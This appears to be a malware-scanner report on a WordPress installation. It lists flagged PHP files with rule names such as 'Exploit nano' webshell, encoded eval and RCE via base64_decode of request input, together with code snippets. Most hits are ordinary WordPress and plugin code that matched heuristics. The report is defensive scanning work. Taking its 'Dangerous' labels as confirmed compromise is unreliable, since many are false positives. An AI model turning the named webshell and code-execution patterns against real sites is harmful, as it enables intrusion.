Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient

[https://github.com/s0md3v/nano]

<?php $p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)

Exploit nano Line: 2779 Dangerous

Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient

[https://github.com/s0md3v/nano]

<?php $p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)

Exploit nano Line: 3701 Dangerous

Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient

[https://github.com/s0md3v/nano]

<?php $p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)

Exploit nano Line: 3947 Dangerous

Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient

[https://github.com/s0md3v/nano]

<?php $p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)

Sign 963e968a Line: 5676 Dangerous

Malware Signature (hash: 963e968a)

<?php php_uname()

/custdata01/kings/.cpaddons_upgrade/wp-admin/includes/file.php

Size: 49.18 kB Created: 2016-05-11 21:37:30 Modified: 2017-03-24 23:55:02 Dangers: 1
DescriptionMatch

Exploit nano Line: 226 Dangerous

Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient

[https://github.com/s0md3v/nano]

<?php $overrides['upload_error_handler'](&$file, $message )

/custdata01/kings/.cpaddons_upgrade/wp-admin/includes/class-wp-filesystem-direct.php

Size: 11.52 kB Created: 2016-05-11 21:37:30 Modified: 2017-03-24 23:55:02 Warns: 1
DescriptionMatch

Function posix_getpwuid Warning

Potentially dangerous function `posix_getpwuid`

[https://www.php.net/posix_getpwuid]

<?php posix_getpwuid($owneruid); return $ownerarray['name']; } public function getchmod($file) { return substr( decoct( @fileperms( $file ) ), -3 ); } public function group($file) { $gid = @filegroup($file); if ( ! $gid ) return false; if ( ! function_exists('posix_getgrgid') ) return $gid; $grouparray = posix_getgrgid($gid); return $grouparray['name']; } public function copy($source, $destination, $overwrite = false, $mode = false) { if ( ! $overwrite && $this->exists($destination) ) return false; $r...

/custdata01/kings/.cpaddons_upgrade/wp-admin/includes/class-wp-filesystem-ssh2.php

Size: 14.95 kB Created: 2016-05-11 21:37:30 Modified: 2017-03-24 23:55:02 Warns: 1
DescriptionMatch

Function posix_getpwuid Warning

Potentially dangerous function `posix_getpwuid`

[https://www.php.net/posix_getpwuid]

<?php posix_getpwuid($owneruid); return $ownerarray['name']; } public function getchmod($file) { return substr( decoct( @fileperms( $this->sftp_path( $file ) ) ), -3 ); } public function group($file) { $gid = @filegroup( $this->sftp_path( $file ) ); if ( ! $gid ) return false; if ( ! function_exists('posix_getgrgid') ) return $gid; $grouparray = posix_getgrgid($gid); return $grouparray['name']; } public function copy($source, $destination, $overwrite = false, $mode = false) { if ( ! $overwrite && $thi...

/custdata01/kings/.cpaddons_upgrade/wp-admin/includes/ms.php

Size: 37.36 kB Created: 2016-05-11 21:37:30 Modified: 2017-03-24 23:55:02 Dangers: 1
DescriptionMatch

Function str_rot13 eval_str_rot13 Line: 598 Dangerous

Encoded Function `eval`

[https://www.php.net/eval]

<?php riny

/custdata01/kings/.trash/1/wp-admin/includes/class-pclzip.php

Size: 191.03 kB Created: 2014-11-24 16:20:41 Modified: 2017-03-24 23:55:13 Dangers: 5
DescriptionMatch

Exploit nano Line: 2622 Dangerous

Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient

[https://github.com/s0md3v/nano]

<?php $p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)

Exploit nano Line: 2775 Dangerous

Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient

[https://github.com/s0md3v/nano]

<?php $p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)

Exploit nano Line: 3697 Dangerous

Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient

[https://github.com/s0md3v/nano]

<?php $p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)

Exploit nano Line: 3943 Dangerous

Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient

[https://github.com/s0md3v/nano]

<?php $p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)

Sign 963e968a Line: 5672 Dangerous

Malware Signature (hash: 963e968a)

<?php php_uname()

/custdata01/kings/.trash/1/wp-admin/includes/class-wp-filesystem-direct.php

Size: 9.55 kB Created: 2014-11-24 16:20:41 Modified: 2017-03-24 23:55:13 Warns: 1
DescriptionMatch

Function posix_getpwuid Warning

Potentially dangerous function `posix_getpwuid`

[https://www.php.net/posix_getpwuid]

<?php posix_getpwuid($owneruid); return $ownerarray['name']; } public function getchmod($file) { return substr( decoct( @fileperms( $file ) ), -3 ); } public function group($file) { $gid = @filegroup($file); if ( ! $gid ) return false; if ( ! function_exists('posix_getgrgid') ) return $gid; $grouparray = posix_getgrgid($gid); return $grouparray['name']; } public function copy($source, $destination, $overwrite = false, $mode = false) { if ( ! $overwrite && $this->exists($destination) ) return false; $r...

/custdata01/kings/.trash/1/wp-admin/includes/class-wp-filesystem-ssh2.php

Size: 11.67 kB Created: 2014-11-24 16:20:41 Modified: 2017-03-24 23:55:13 Warns: 1
DescriptionMatch

Function posix_getpwuid Warning

Potentially dangerous function `posix_getpwuid`

[https://www.php.net/posix_getpwuid]

<?php posix_getpwuid($owneruid); return $ownerarray['name']; } public function getchmod($file) { return substr( decoct( @fileperms( 'ssh2.sftp://' . $this->sftp_link . '/' . ltrim( $file, '/' ) ) ), -3 ); } public function group($file) { $gid = @filegroup('ssh2.sftp://' . $this->sftp_link . '/' . ltrim($file, '/')); if ( ! $gid ) return false; if ( ! function_exists('posix_getgrgid') ) return $gid; $grouparray = posix_getgrgid($gid); return $grouparray['name']; } public function copy($source, $destina...

/custdata01/kings/.trash/1/wp-admin/includes/file.php

Size: 44.13 kB Created: 2014-11-24 16:20:41 Modified: 2017-03-24 23:55:13 Dangers: 1
DescriptionMatch

Exploit nano Line: 204 Dangerous

Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient

[https://github.com/s0md3v/nano]

<?php $overrides['upload_error_handler'](&$file, $message )

/custdata01/kings/.trash/1/wp-admin/includes/ms.php

Size: 28.29 kB Created: 2014-11-24 16:20:41 Modified: 2017-03-24 23:55:14 Dangers: 1
DescriptionMatch

Function str_rot13 eval_str_rot13 Line: 490 Dangerous

Encoded Function `eval`

[https://www.php.net/eval]

<?php riny

/custdata01/kings/.trash/1/wp-admin/press-this.php

Size: 26.18 kB Created: 2014-11-24 16:20:41 Modified: 2017-03-24 23:55:08 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(
            jQuery.ajax({
                type: "GET",
                url: "<?php echo esc_url($_SERVER['PHP_SELF']); ?>",
                cache : false,
                async : false,
                data: "ajax=photo_images&u=<?php echo urlencode($url); ?>",
                dataType : "script"
            }).responseText
        );
        if(my_src.length == 0) {
            var my_src = eval(
                jQuery.ajax({
                    type: "GET",
                    url: "<?php echo esc_url($_SERVER['PHP_SELF']); ?>",
                    cache : false,
                    async : false,
                    data: "ajax=photo_images&u=<?php echo urlencode($url); ?>",
                    ...

/custdata01/kings/.trash/1/wp-content/plugins/rapidranker/min/lib/Minify/ClosureCompiler.php

Size: 3.66 kB Created: 2015-04-17 00:14:36 Modified: 2017-03-24 23:55:18 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

<?php exec(self::_getCmd($options, $tmpFile), $output, $result_code); unlink($tmpFile); if ($result_code != 0) { throw new Exception('Minify_ClosureCompiler : Closure Compiler execution failed.'); } return implode("\n", $output); } private static function _getCmd($userOptions, $tmpFile) { $o = array_merge( array( 'charset' => 'utf-8', 'compilation_level' => 'SIMPLE_OPTIMIZATIONS', ), $userOptions ); $cmd = self::$javaExecutable . ' -jar ' . escapeshellarg(self::$jarFile) . (preg_match('/^[\\da-zA-Z0-9...

/custdata01/kings/.trash/1/wp-content/plugins/rapidranker/min/lib/Minify/YUICompressor.php

Size: 4.60 kB Created: 2015-04-17 00:14:36 Modified: 2017-03-24 23:55:18 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

<?php exec(self::_getCmd($options, $type, $tmpFile), $output, $result_code); unlink($tmpFile); if ($result_code != 0) { throw new Exception('Minify_YUICompressor : YUI compressor execution failed.'); } return implode("\n", $output); } private static function _getCmd($userOptions, $type, $tmpFile) { $o = array_merge( array( 'charset' => '' ,'line-break' => 5000 ,'type' => $type ,'nomunge' => false ,'preserve-semi' => false ,'disable-optimizations' => false ,'stack-size' => '' ) ,$userOptions ); $cmd = ...

/custdata01/kings/.trash/1/wp-includes/ID3/module.audio-video.quicktime.php

Size: 113.18 kB Created: 2014-11-24 16:20:41 Modified: 2017-03-24 23:55:50 Dangers: 1
DescriptionMatch

Function str_rot13 eval_str_rot13 Line: 1535 Dangerous

Encoded Function `eval`

[https://www.php.net/eval]

<?php riny

/custdata01/kings/.trash/1/wp-includes/SimplePie/Parse/Date.php

Size: 19.22 kB Created: 2014-11-24 16:20:41 Modified: 2017-03-24 23:55:50 Warns: 1
DescriptionMatch

Exploit concat_vars_with_spaces Line: 786 Warning

Concatenation of vars technique is usually used for the obfuscation of malicious code

<?php $day . $fws . $month . $fws . $year . $fws .

/custdata01/kings/.trash/1/wp-includes/Text/Diff/Engine/native.php

Size: 15.47 kB Created: 2014-11-24 16:20:41 Modified: 2017-03-24 23:55:50 Warns: 1
DescriptionMatch

Function assert Warning

Potentially dangerous function `assert`

[https://www.php.net/assert]

<?php assert($yi < $n_to || $this->xchanged[$xi]); assert($xi < $n_from || $this->ychanged[$yi]); $copy = array(); while ($xi < $n_from && $yi < $n_to && !$this->xchanged[$xi] && !$this->ychanged[$yi]) { $copy[] = $from_lines[$xi++]; ++$yi; } if ($copy) { $edits[] = new Text_Diff_Op_copy($copy); } $delete = array(); while ($xi < $n_from && $this->xchanged[$xi]) { $delete[] = $from_lines[$xi++]; } $add = array(); while ($yi < $n_to && $this->ychanged[$yi]) { $add[] = $to_lines[$yi++]; } if ($delete && ...

/custdata01/kings/.trash/1/wp-includes/Text/Diff/Engine/shell.php

Size: 5.05 kB Created: 2014-11-24 16:20:41 Modified: 2017-03-24 23:55:50 Warns: 2
DescriptionMatch

Function assert Warning

Potentially dangerous function `assert`

[https://www.php.net/assert]

<?php assert('$match[1] - $from_line_no == $match[4] - $to_line_no'); array_push($edits, new Text_Diff_Op_copy( $this->_getLines($from_lines, $from_line_no, $match[1] - 1), $this->_getLines($to_lines, $to_line_no, $match[4] - 1))); } switch ($match[3]) { case 'd': array_push($edits, new Text_Diff_Op_delete( $this->_getLines($from_lines, $from_line_no, $match[2]))); $to_line_no++; break; case 'c': array_push($edits, new Text_Diff_Op_change( $this->_getLines($from_lines, $from_line_no, $match[2]), $this...

Function shell_exec Warning

Potentially dangerous function `shell_exec`

[https://www.php.net/shell_exec]

<?php shell_exec($this->_diffCommand . ' ' . $from_file . ' ' . $to_file); unlink($from_file); unlink($to_file); if (is_null($diff)) { return array(new Text_Diff_Op_copy($from_lines)); } $from_line_no = 1; $to_line_no = 1; $edits = array(); preg_match_all('#^(\d+)(?:,(\d+))?([adc])(\d+)(?:,(\d+))?$#m', $diff, $matches, PREG_SET_ORDER); foreach ($matches as $match) { if (!isset($match[5])) { $match[5] = false; } if ($match[3] == 'a') { $from_line_no--; } if ($match[3] == 'd') { $to_line_no--; } if ($fr...

/custdata01/kings/.trash/1/wp-includes/Text/Diff.php

Size: 11.67 kB Created: 2014-11-24 16:20:41 Modified: 2017-03-24 23:55:50 Warns: 1
DescriptionMatch

Function assert Warning

Potentially dangerous function `assert`

[https://www.php.net/assert]

<?php assert(count($from_lines) == count($mapped_from_lines)); assert(count($to_lines) == count($mapped_to_lines)); parent::Text_Diff($mapped_from_lines, $mapped_to_lines); $xi = $yi = 0; for ($i = 0; $i < count($this->_edits); $i++) { $orig = &$this->_edits[$i]->orig; if (is_array($orig)) { $orig = array_slice($from_lines, $xi, count($orig)); $xi += count($orig); } $final = &$this->_edits[$i]->final; if (is_array($final)) { $final = array_slice($to_lines, $yi, count($final)); $yi += count($final); } ...

/custdata01/kings/.trash/1/wp-includes/pomo/po.php

Size: 11.21 kB Created: 2014-11-24 16:20:41 Modified: 2017-03-24 23:55:54 Warns: 1
DescriptionMatch

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

<?php create_function('$x', "return $php_with.\$x;"), $lines)); if ("\n" == substr($string, -1)) $res .= "\n"; return $res; } function comment_block($text, $char=' ') { $text = wordwrap($text, PO_MAX_LINE_LEN - 3); return PO::prepend_each_line($text, "#$char "); } function export_entry(&$entry) { if (is_null($entry->singular)) return false; $po = array(); if (!empty($entry->translator_comments)) $po[] = PO::comment_block($entry->translator_comments); if (!empty($entry->extracted_comments)) $po[] = PO:...

/custdata01/kings/.trash/1/wp-includes/pomo/translations.php

Size: 7.35 kB Created: 2014-11-24 16:20:41 Modified: 2017-03-24 23:55:54 Warns: 1
DescriptionMatch

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

<?php create_function('$n', $func_body); } function parenthesize_plural_exression($expression) { $expression .= ';'; $res = ''; $depth = 0; for ($i = 0; $i < strlen($expression); ++$i) { $char = $expression[$i]; switch ($char) { case '?': $res .= ' ? ('; $depth++; break; case ':': $res .= ') : ('; break; case ';': $res .= str_repeat(')', $depth) . ';'; $depth= 0; break; default: $res .= $char; } } return rtrim($res, ';'); } function make_headers($translation) { $headers = array(); $translation = str_r...

/custdata01/kings/.trash/1/wp-includes/atomlib.php

Size: 10.66 kB Created: 2014-11-24 16:20:41 Modified: 2017-03-24 23:55:48 Warns: 1
DescriptionMatch

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

<?php create_function('$k,$v', 'return "$k=\"$v\"";'); $this->map_xmlns_func = create_function('$p,$n', '$xd = "xmlns"; if(strlen($n[0])>0) $xd .= ":{$n[0]}"; return "{$xd}=\"{$n[1]}\"";'); } function _p($msg) { if($this->debug) { print str_repeat(" ", $this->depth * $this->indent) . $msg ."\n"; } } function error_handler($log_level, $log_text, $error_file, $error_line) { $this->error = $log_text; } function parse() { set_error_handler(array(&$this, 'error_handler')); array_unshift($this->ns_contexts,...

/custdata01/kings/.trash/1/wp-includes/class-smtp.php

Size: 27.89 kB Created: 2014-11-24 16:20:41 Modified: 2017-03-24 23:55:48 Dangers: 1
DescriptionMatch

Exploit hacked_by Line: 412 Dangerous

Hacker credits

<?php Hacked by

/custdata01/kings/.trash/1/wp-includes/class-snoopy.php

Size: 36.89 kB Created: 2014-11-24 16:20:41 Modified: 2017-03-24 23:55:48 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

<?php exec($this->curl_path." -k -D \"$headerfile\"".$cmdline_params." \"".escapeshellcmd($URI)."\"",$results,$return); if($return) { $this->error = "Error: cURL could not retrieve the document, error $return."; return false; } $results = implode("\r\n",$results); $result_headers = file("$headerfile"); $this->_redirectaddr = false; unset($this->headers); for($currentHeader = 0; $currentHeader < count($result_headers); $currentHeader++) { if(preg_match("/^(Location: |URI: )/i",$result_headers[$currentH...

/custdata01/kings/.trash/1/wp-includes/pluggable.php

Size: 72.91 kB Created: 2014-11-24 16:20:41 Modified: 2017-03-24 23:55:49 Dangers: 1
DescriptionMatch

Sign 11413268 Line: 1064 Dangerous

Malware Signature (hash: 11413268)

<?php exploit

/custdata01/kings/.trash/1/wp-includes/kses.php

Size: 41.81 kB Created: 2014-11-24 16:20:41 Modified: 2017-03-24 23:55:49 Dangers: 1
DescriptionMatch

Sign 1414e381 Line: 782 Dangerous

Malware Signature (hash: 1414e381)

<?php $mode = 0;
    $attrname = '';
    $uris = array('xmlns', 'profile', 'href', 'src', 'cite', 'classid', 'codebase', 'data', 'usemap', 'longdesc',

/custdata01/kings/.trash/wp-admin/includes/class-pclzip.php

Size: 191.03 kB Created: 2016-06-12 22:15:52 Modified: 2017-03-24 23:55:55 Dangers: 5
DescriptionMatch

Exploit nano Line: 2622 Dangerous

Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient

[https://github.com/s0md3v/nano]

<?php $p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)

Exploit nano Line: 2775 Dangerous

Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient

[https://github.com/s0md3v/nano]

<?php $p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)

Exploit nano Line: 3697 Dangerous

Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient

[https://github.com/s0md3v/nano]

<?php $p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)

Exploit nano Line: 3943 Dangerous

Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient

[https://github.com/s0md3v/nano]

<?php $p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)

Sign 963e968a Line: 5672 Dangerous

Malware Signature (hash: 963e968a)

<?php php_uname()

/custdata01/kings/.trash/wp-admin/includes/class-wp-filesystem-direct.php

Size: 9.33 kB Created: 2016-06-12 22:15:52 Modified: 2017-03-24 23:55:55 Warns: 1
DescriptionMatch

Function posix_getpwuid Warning

Potentially dangerous function `posix_getpwuid`

[https://www.php.net/posix_getpwuid]

<?php posix_getpwuid($owneruid); return $ownerarray['name']; } function getchmod($file) { return substr(decoct(@fileperms($file)),3); } function group($file) { $gid = @filegroup($file); if ( ! $gid ) return false; if ( ! function_exists('posix_getgrgid') ) return $gid; $grouparray = posix_getgrgid($gid); return $grouparray['name']; } function copy($source, $destination, $overwrite = false, $mode = false) { if ( ! $overwrite && $this->exists($destination) ) return false; $rtval = copy($source, $destina...

/custdata01/kings/.trash/wp-admin/includes/class-wp-filesystem-ssh2.php

Size: 11.17 kB Created: 2016-06-12 22:15:52 Modified: 2017-03-24 23:55:55 Warns: 1
DescriptionMatch

Function posix_getpwuid Warning

Potentially dangerous function `posix_getpwuid`

[https://www.php.net/posix_getpwuid]

<?php posix_getpwuid($owneruid); return $ownerarray['name']; } function getchmod($file) { return substr(decoct(@fileperms( 'ssh2.sftp://' . $this->sftp_link . '/' . ltrim($file, '/') )),3); } function group($file) { $gid = @filegroup('ssh2.sftp://' . $this->sftp_link . '/' . ltrim($file, '/')); if ( ! $gid ) return false; if ( ! function_exists('posix_getgrgid') ) return $gid; $grouparray = posix_getgrgid($gid); return $grouparray['name']; } function copy($source, $destination, $overwrite = false, $mo...

/custdata01/kings/.trash/wp-admin/includes/file.php

Size: 41.05 kB Created: 2016-06-12 22:15:53 Modified: 2017-03-24 23:55:55 Dangers: 1
DescriptionMatch

Exploit nano Line: 231 Dangerous

Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient

[https://github.com/s0md3v/nano]

<?php $overrides['upload_error_handler'](&$file, $message )

/custdata01/kings/.trash/wp-admin/includes/import.php

Size: 5.77 kB Created: 2016-06-12 22:15:53 Modified: 2017-03-24 23:55:55 Warns: 1
DescriptionMatch

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

<?php create_function('$a, $b', 'return strcmp($a[0], $b[0]);')); return $wp_importers; } function register_importer( $id, $name, $description, $callback ) { global $wp_importers; if ( is_wp_error( $callback ) ) return $callback; $wp_importers[$id] = array ( $name, $description, $callback ); } function wp_import_cleanup( $id ) { wp_delete_attachment( $id ); } function wp_import_handle_upload() { if ( !isset($_FILES['import']) ) { $file['error'] = __( 'File is empty. Please upload something more substa...

/custdata01/kings/.trash/wp-admin/includes/media.php

Size: 79.21 kB Created: 2016-06-12 22:15:53 Modified: 2017-03-24 23:55:55 Warns: 1
DescriptionMatch

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

<?php create_function( '$a', "return 'LIMIT $start, 10';" ) ); list($post_mime_types, $avail_post_mime_types) = wp_edit_attachments_query(); ?>

<form id="filter" action="" method="get">
<input type="hidden" name="type" value="<?php echo esc_attr( $type ); ?>" />
<input type="hidden" name="tab" value="<?php echo esc_attr( $tab ); ?>" />
<input type="hidden" name="post_id" value="<?php echo (int) $post_id; ?>" />
<input type="hidden" name="post_mime_type" value="<?php echo isset( $_GET['post_mime_type'...

/custdata01/kings/.trash/wp-admin/includes/menu.php

Size: 6.16 kB Created: 2016-06-12 22:15:53 Modified: 2017-03-24 23:55:55 Warns: 1
DescriptionMatch

Exploit double_var2 Line: 51 Warning

Double var technique is usually used for the obfuscation of malicious code

<?php ${$sub_loop}

/custdata01/kings/.trash/wp-admin/includes/ms.php

Size: 25.54 kB Created: 2016-06-12 22:15:53 Modified: 2017-03-24 23:55:55 Dangers: 1
DescriptionMatch

Function str_rot13 eval_str_rot13 Line: 409 Dangerous

Encoded Function `eval`

[https://www.php.net/eval]

<?php riny

/custdata01/kings/.trash/wp-admin/js/revisions-js.php

Size: 3.09 kB Created: 2016-06-12 22:15:56 Modified: 2017-03-24 23:55:56 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\\b'+e(c)+'\\\\b','g'),k[c]);return p}('6(4(){2 e=6(\\'#Q\\').v();2 i=\\'\\\\\\',.R/=\\\\\\\\S-;T"<>U?+|V:W[]X{}\\'.u(\\'\\');2 o=\\'Y[]\\\\\\\\Z;\\\\\\'10,./11{}|12:"13<>?-=14+\\'.u(\\'\\');2 5=4(s){r=\\'\\'...

/custdata01/kings/.trash/wp-admin/import.php

Size: 5.15 kB Created: 2016-06-12 22:15:38 Modified: 2017-03-24 23:55:54 Warns: 1
DescriptionMatch

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

<?php create_function('$a, $b', 'return strnatcasecmp($a[0], $b[0]);')); ?>
<table class="widefat importers" cellspacing="0">

<?php
 $alt = ''; foreach ($importers as $importer_id => $data) { $action = ''; if ( isset( $data['install'] ) ) { $plugin_slug = $data['install']; if ( file_exists( WP_PLUGIN_DIR . '/' . $plugin_slug ) ) { $plugins = get_plugins( '/' . $plugin_slug ); if ( !empty($plugins) ) { $keys = array_keys($plugins); $plugin_file = $plugin_slug . '/' . $keys[0]; $action = '<a href="' . ...

/custdata01/kings/.trash/wp-admin/press-this.php

Size: 25.25 kB Created: 2016-06-12 22:15:40 Modified: 2017-03-24 23:55:54 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(
            jQuery.ajax({
                type: "GET",
                url: "<?php echo esc_url($_SERVER['PHP_SELF']); ?>",
                cache : false,
                async : false,
                data: "ajax=photo_images&u=<?php echo urlencode($url); ?>",
                dataType : "script"
            }).responseText
        );
        if(my_src.length == 0) {
            var my_src = eval(
                jQuery.ajax({
                    type: "GET",
                    url: "<?php echo esc_url($_SERVER['PHP_SELF']); ?>",
                    cache : false,
                    async : false,
                    data: "ajax=photo_images&u=<?php echo urlencode($url); ?>",
                    ...

/custdata01/kings/.trash/wp-content/plugins/business-directory-plugin/api/api.php

Size: 18.68 kB Created: 2016-06-12 22:16:23 Modified: 2017-03-24 23:55:59 Warns: 1
DescriptionMatch

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

<?php create_function('&$x', '$x = intval($x->term_id);')); return $parent_categories; } function wpbdp_locate_template($template, $allow_override=true, $try_defaults=true) { $template_file = ''; if (!is_array($template)) $template = array($template); if ($allow_override) { $search_for = array(); foreach ($template as $t) { $search_for[] = $t . '.tpl.php'; $search_for[] = $t . '.php'; $search_for[] = 'single/' . $t . '.tpl.php'; $search_for[] = 'single/' . $t . '.php'; } $template_file = locate_templa...

/custdata01/kings/.trash/wp-content/plugins/business-directory-plugin/api/form-fields.php

Size: 45.60 kB Created: 2016-06-12 22:16:23 Modified: 2017-03-24 23:55:59 Warns: 1
DescriptionMatch

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

<?php create_function( '$x', 'return join(",", $x);' ) ) ); extract( $args, EXTR_SKIP ); if ( is_string( $values ) ) $values = explode( ',', $values ); if ( !in_array( $value, $values ) ) return WPBDP_ValidationError( sprintf( _x( '%s is invalid. Value most be one of %s.', 'form-fields-api validation', 'WPBDM' ), esc_attr( $args['field-label'] ), call_user_func( $formatter, $values ) ) ); } } } function &wpbdp_get_form_fields( $args=array() ) { global $wpbdp; return $wpbdp->formfields->find_fields( $a...

/custdata01/kings/.trash/wp-content/plugins/business-directory-plugin/api/payment.php

Size: 17.07 kB Created: 2016-06-12 22:16:23 Modified: 2017-03-24 23:55:59 Warns: 1 Dangers: 1
DescriptionMatch

Exploit execution Line: 296 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php base64_decode($_GET['tid'])

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

<?php create_function('&$x', '$x = intval($x->term_id);')); foreach ($this->get_fees() as $fee) { if ($fee->categories['all']) { $fees[] = $fee; } else { foreach ($fee->categories['categories'] as $fee_catid) { if (in_array($fee_catid, $parent_categories)) { $fees[] = $fee; break; } } } } } if (!$fees) $fees[] = $this->get_free_fee(); return $fees; } public function get_fees($categories=null) { global $wpdb; if (isset($categories)) { $fees = array(); foreach ($categories as $catid) { $category_fees = ...

/custdata01/kings/.trash/wp-content/plugins/business-directory-plugin/api/templates-ui.php

Size: 14.15 kB Created: 2016-06-12 22:16:23 Modified: 2017-03-24 23:55:59 Warns: 1
DescriptionMatch

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

<?php create_function( '$x', 'return $x->count > 0;' ) ); } $html = ''; if ( !$terms && $depth == 0 ) { $html .= '<p>' . _x( 'No listing categories found.', 'templates', 'WPBDM' ) . '</p>'; return $html; } if ( $depth > 0 ) { $html .= str_repeat( "\t", $depth ); if ( apply_filters( 'wpbdp_categories_list_anidate_children', true ) ) { $html .= '<ul class="children">'; } } foreach ( $terms as &$term ) { $html .= '<li class="cat-item cat-item-' . $term->term_id . ' ' . apply_filters( 'wpbdp_categories_li...

/custdata01/kings/.trash/wp-content/plugins/business-directory-plugin/api/wpbdp-settings.class.php

Size: 30.44 kB Created: 2016-06-12 22:16:23 Modified: 2017-03-24 23:55:59 Warns: 1
DescriptionMatch

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

<?php create_function('', ';'); if ($section->help_text) $callback = create_function('', 'echo "<p class=\"description\">' . $section->help_text . '</p>";'); add_settings_section($section->slug, $section->name, $callback, $group->wpslug); foreach ($section->settings as $setting) { register_setting($group->wpslug, self::PREFIX . $setting->name); add_settings_field(self::PREFIX . $setting->name, $setting->label, array($this, '_setting_' . $setting->type), $group->wpslug, $section->slug, array_merge($set...

/custdata01/kings/.trash/wp-content/plugins/business-directory-plugin/views.php

Size: 43.00 kB Created: 2016-06-12 22:16:05 Modified: 2017-03-24 23:55:56 Warns: 1 Dangers: 1
DescriptionMatch

Exploit execution Line: 376 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php base64_decode($_POST['listing_data'])

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

<?php create_function('$x', 'return get_post($x) !== null;')); $this->_listing_data['images'] = $images; switch ($action) { case 'upload': if (($images_allowed - count($images) - 1) >= 0) { if ($image_file = $_FILES['image']) { $image_error = ''; if ( $attachment_id = wpbdp_media_upload( $image_file, true, true, array( 'image' => true, 'max-size' => intval(wpbdp_get_option( 'image-max-filesize' )) * 1024 ), $image_error ) ) { $this->_listing_data['images'][] = $attachment_id; } else { $validation_erro...

/custdata01/kings/.trash/wp-content/plugins/business-directory-plugin/wpbusdirman.php

Size: 35.61 kB Created: 2016-06-12 22:16:05 Modified: 2017-03-24 23:55:56 Warns: 1
DescriptionMatch

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

<?php create_function('$x', 'wpbdp_debug($x); return $x;')); add_filter('rewrite_rules_array', array($this, '_rewrite_rules')); add_filter('query_vars', array($this, '_query_vars')); add_filter( 'redirect_canonical', array( $this, '_redirect_canonical' ), 10, 2 ); add_action('template_redirect', array($this, '_template_redirect')); add_action('wp_loaded', array($this, '_wp_loaded')); add_action('pre_get_posts', array($this, '_pre_get_posts')); add_action('posts_fields', array($this, '_posts_fields'), ...

/custdata01/kings/.trash/wp-content/plugins/easy-contact-forms/easy-contact-forms-backoffice.php

Size: 9.81 kB Created: 2016-06-12 22:16:05 Modified: 2017-03-24 23:56:01 Warns: 1
DescriptionMatch

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

